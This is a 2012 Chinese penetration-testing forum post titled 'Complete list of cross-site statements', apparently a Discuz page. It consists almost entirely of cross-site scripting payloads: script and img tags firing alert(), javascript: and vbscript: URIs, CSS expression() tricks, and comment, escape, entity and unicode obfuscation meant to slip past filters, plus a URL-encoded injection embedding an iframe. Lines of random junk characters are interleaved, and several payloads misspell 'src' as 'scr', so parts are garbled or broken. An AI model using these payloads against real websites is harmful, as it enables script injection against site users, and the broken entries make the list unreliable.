中国网络渗透测试联盟
标题:
跨站语句大全
[打印本页]
作者:
admin
时间:
2012-9-13 17:15
标题:
跨站语句大全
<script>alert("跨站")</script> (最常用)
& _" T% F9 R( `" @! Z/ a
<img scr=javascript:alert("跨站")></img>
; M/ ?0 i- S3 e" I7 `
<img scr="javascript: alert(/跨站/)></img>
. l" \; _5 z) q" `! j
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
5 M% D0 _( v6 S
<img scr="#" onerror=alert(/跨站/)></img>
/ P2 U- J7 Z, M k
<img scr="#" style="xss:expression(alert(/xss/));"></img>
& E. b7 |4 f1 i
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
9 b, s. B. X3 N
<img src=vbscript:msgbox ("xss")></img>
9 u' v% b. p5 i$ a1 ~
<style> input {left:expression (alert('xss'))}</style>
* n; ?& N/ d$ O, S; _. T
<div style={left:expression (alert('xss'))}></div>
n( e I7 J. ^
<div style={left:exp/* */ression (alert('xss'))}></div>
1 y9 ^1 I$ `; o, O' M
<div style={left:\0065\0078ression (alert('xss'))}></div>
8 e% u% Z. w" l/ Q
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
( R b n9 u# Z" {
unicode <div style="{left:expRessioN (alert('xss'))}">
8 C& u# C% O* v3 d0 U) i: R
, p& r0 q7 \' Q- O) ]
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
7 v+ t3 P2 G) u; @2 Y! z8 M2 ~
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2